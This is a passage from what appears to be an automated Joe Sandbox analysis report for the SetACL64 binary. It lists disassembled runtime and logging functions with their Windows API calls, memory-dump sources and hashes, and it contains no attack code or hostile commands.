                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$DEBUG,
                                                  • API String ID: 3988221542-4222748730
                                                  • Opcode ID: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
                                                  • Instruction ID: fafa2f05d2ace5064420f4de22cdb0615c5cf6e39a802da7015be500252d9f54
                                                  • Opcode Fuzzy Hash: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
                                                  • Instruction Fuzzy Hash: 55219D61A0868284EF15EF17D54C3B9A762AB49BA4FD25431CA0D066E7EFECD444C360
                                                  Function 00007FF7C171DB73 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalLeaveSection
                                                  • String ID: %s$INFO ,
                                                  • API String ID: 3988221542-2224252516
                                                  • Opcode ID: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
                                                  • Instruction ID: d3fe4062dc854d14f23944379e65fb928a522f077371a9ab48faf6590bdd7322
                                                  • Opcode Fuzzy Hash: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
                                                  • Instruction Fuzzy Hash: A3219D61A0868284EF14EF17D54C3B9A762AB49BA4FD25431CA0D066E7EFECD444C360
                                                  Function 00007FF7C174E568 Relevance: 4.5, APIs: 3, Instructions: 27threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7C1753FE0: GetLastError.KERNEL32(?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000,00007FF7C175D70B,?,?,?), ref: 00007FF7C1753FEF
                                                    • Part of subcall function 00007FF7C1753FE0: SetLastError.KERNEL32(?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000,00007FF7C175D70B,?,?,?), ref: 00007FF7C175408D
                                                  • CloseHandle.KERNEL32(?,?,00000000,00007FF7C174E709,?,?,?,?,00007FF7C171EA35), ref: 00007FF7C174E5A3
                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,00000000,00007FF7C174E709,?,?,?,?,00007FF7C171EA35), ref: 00007FF7C174E5B9
                                                    • Part of subcall function 00007FF7C1758230: try_get_function.LIBVCRUNTIME ref: 00007FF7C175824E
                                                  • ExitThread.KERNEL32 ref: 00007FF7C174E5C2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrarytry_get_function
                                                  • String ID:
                                                  • API String ID: 1393601959-0
                                                  • Opcode ID: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                                                  • Instruction ID: 4af79ae36e2d8b7acac073c358fd5429f56f9a370f75f87e5a73e67f33ea0cf1
                                                  • Opcode Fuzzy Hash: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                                                  • Instruction Fuzzy Hash: F8F04421B08A4642EB147F22845417CE7649F49B74FA84735D63C022D6FFBCD45583B0
                                                  Function 00007FF7C17530B0 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                                                  • Instruction ID: 7fee82db3e1f6777f624650ec458a9ff62394c2764442af9c27a26cb482abcec
                                                  • Opcode Fuzzy Hash: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                                                  • Instruction Fuzzy Hash: A3E04F20B18B0982EB14BF3798A527D6292AF8D721F408538C80E03373CDBEE4498320
                                                  Function 00007FF7C171E8C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: StartLoggerThreadProc: arg0==NULL
                                                  • API String ID: 3668304517-2114133805
                                                  • Opcode ID: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                                                  • Instruction ID: 4bb5c715dd298b27ff2217d8de8872b62e7bde72550a01cceba44ff7e38e57aa
                                                  • Opcode Fuzzy Hash: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                                                  • Instruction Fuzzy Hash: 3E415C7271468681EF45AF2AD48836DA362EF88B98FD14036DA4D07A6ADFACD4908350
                                                  Function 00007FF7C1757BC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: try_get_function
                                                  • String ID: AppPolicyGetThreadInitializationType
                                                  • API String ID: 2742660187-3350320272
                                                  • Opcode ID: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                                                  • Instruction ID: bace5d640c15720a3fa5d02e36ff48fb20608cd74a556d4921be23626f82ea21
                                                  • Opcode Fuzzy Hash: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                                                  • Instruction Fuzzy Hash: 7CE04F51E0990691FB06AF93A8101B092119F0C370EC89336D93C0A3E29FBC99D9C7A0
                                                  Function 00007FF7C17588F8 Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID:
                                                  • API String ID: 3000768030-0
                                                  • Opcode ID: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                                                  • Instruction ID: 233eaa671624e01a41c89b8e7e366f45671a3bc886ebe47de2c3e3622dee9812
                                                  • Opcode Fuzzy Hash: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                                                  • Instruction Fuzzy Hash: 7731CA21A18F4682D760AF178564179B660FB497B0FA80339DBAE073E1CF78E471C312
                                                  Function 00007FF7C174E500 Relevance: 3.0, APIs: 2, Instructions: 30threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitLastThread
                                                  • String ID:
                                                  • API String ID: 1611280651-0
                                                  • Opcode ID: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
                                                  • Instruction ID: 8ea9b533cb800909ffebd8f509bff697dd3973e7dfac36933421996400818d68
                                                  • Opcode Fuzzy Hash: 0a4e96a3b88f839fc0d37f454c2d20bdf8464b58d4c268462bd8fbbd0cbad1db
                                                  • Instruction Fuzzy Hash: 7FF03015F09A4682EF14BF73981917CE2A09F5DB34F948434D90A433A3EF6C98558720
                                                  Function 00007FF7C17535C0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TlsFree.KERNELBASE(?,?,?,00007FF7C17533F9,?,?,?,00007FF7C175371D,?,?,?,?,?,?,00007FF7C1752F93), ref: 00007FF7C1753645
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Free
                                                  • String ID:
                                                  • API String ID: 3978063606-0
                                                  • Opcode ID: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                                                  • Instruction ID: d65574ae27d0aa832cb872b65c3331c161c3c462e42a0c2a24fb1e475b5d959d
                                                  • Opcode Fuzzy Hash: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                                                  • Instruction Fuzzy Hash: CC316C22B04F4981AB10AF17E460169A3A0E74CFF4B989636DF6D0BBA5CF7CD4928350
                                                  Function 00007FF7C174E218 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C174E258
                                                    • Part of subcall function 00007FF7C174892C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C17488D9), ref: 00007FF7C1748935
                                                    • Part of subcall function 00007FF7C174892C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C17488D9), ref: 00007FF7C174895A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 4036615347-0
                                                  • Opcode ID: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                                                  • Instruction ID: ac51dcf6cce31e023fb81c41b260e88b60d4fdaf157d2e8982e063a5be090be3
                                                  • Opcode Fuzzy Hash: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                                                  • Instruction Fuzzy Hash: 0A219F31A0DB1286F715BFA69511239E691AF48BB0F858634DE9C07BC7DFBCE8014B20
                                                  Function 00007FF7C1752FF4 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                  • String ID:
                                                  • API String ID: 3947729631-0
                                                  • Opcode ID: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                                                  • Instruction ID: 9abaaf4855ea88a14923a7a6f6e9a40a45d9c4f640d855f7c694675896f9a37d
                                                  • Opcode Fuzzy Hash: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                                                  • Instruction Fuzzy Hash: D0218032E04B05C9EB11EF65C4942ED77A1EB48718F84853AD61D02A96DFB8D485CBA0
                                                  Function 00007FF7C175D280 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                                                  • Instruction ID: 8a03b74f3c7984448cde599b3336377d66e3bca58c7a4caef3777aca393149c4
                                                  • Opcode Fuzzy Hash: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                                                  • Instruction Fuzzy Hash: 3B115832A1CA4282F310AF56E550169E3A5FB4D7A0F854134E65D476A7CEBCE8218B60
                                                  Function 00007FF7C17499A4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
                                                  • Instruction ID: ffa018c66b1c0ab62c6575403b69904a67bc4f4f3d934b29ba2162bd7b5c6d86
                                                  • Opcode Fuzzy Hash: 722239ba75a1275613d8d5edc4f854a8cebc1af2643a0ced5ac4e3957d6e0898
                                                  • Instruction Fuzzy Hash: 1411E472A14B569DEB10EFA1D4812ED37B8FB0836CF900636EA4D16B5ADF74C194C7A0
                                                  Function 00007FF7C174D5BC Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
                                                  • Instruction ID: e3e48e263a7e149cce940042e08a344c08ab822f3b8fcee2a6a2498831e1b29b
                                                  • Opcode Fuzzy Hash: da481b460c6bc961ce96e17a769fa7a37d49dd1e559ba5bc478610412f584907
                                                  • Instruction Fuzzy Hash: BB11D672A11F559CEB11DFA1E8404DC37B8FB183ACB900635EA5D12B59EF74C1A5C790
                                                  Function 00007FF7C175BCC4 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7C1755094: RtlAllocateHeap.NTDLL(?,?,?,00007FF7C175BCE1,?,?,00000000,00007FF7C175D70B,?,?,?,00007FF7C17534C7,?,?,?,00007FF7C17533BD), ref: 00007FF7C17550D2
                                                  • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF7C175D70B,?,?,?,00007FF7C17534C7,?,?,?,00007FF7C17533BD,?,?,?,00007FF7C175378E), ref: 00007FF7C175BD31
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 9cdcd61cdf70f904c49f21d180333aab02995e45e4132c0ba3bc39a00b87e90c
                                                  • Instruction ID: 6f7f1871edc7f03eb248e9ca11bcfee8693d3277a653a50d2a893e75ca8c2a14
                                                  • Opcode Fuzzy Hash: 9cdcd61cdf70f904c49f21d180333aab02995e45e4132c0ba3bc39a00b87e90c
                                                  • Instruction Fuzzy Hash: 6801E810E0DA4780FB95BF6755612B991525F8D7B0FC88231EE2E472D7EDBCE4404225
                                                  Function 00007FF7C1754FDC Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7C175403D,?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000), ref: 00007FF7C1755031
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                                                  • Instruction ID: 8d7a6f1b6a23194ec2b687de9ab5b63070eb1d575176e41206ce048ef144f568
                                                  • Opcode Fuzzy Hash: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                                                  • Instruction Fuzzy Hash: 80F03714B0AA0781FF547EA799252B582805F4DBA0FCC5031C90E86793EDBCA4814270
                                                  Function 00007FF7C1755094 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(?,?,?,00007FF7C175BCE1,?,?,00000000,00007FF7C175D70B,?,?,?,00007FF7C17534C7,?,?,?,00007FF7C17533BD), ref: 00007FF7C17550D2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
                                                  • Instruction ID: bec5f7d43bf05c93e0c4607ca598c4b596a99968609605b3eb1fc371d60ae75d
                                                  • Opcode Fuzzy Hash: 2f196856deb6c2beed50a9074e3ee722879ff99fb33f915a306f397b97a56255
                                                  • Instruction Fuzzy Hash: CDF0FE10B09A07C5FB947EB35961279D2815F4D7B0FD88630DD2E862C3DDBCE8808171
                                                  Function 00007FF7C1701130 Relevance: 1.5, APIs: 1, Instructions: 20networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
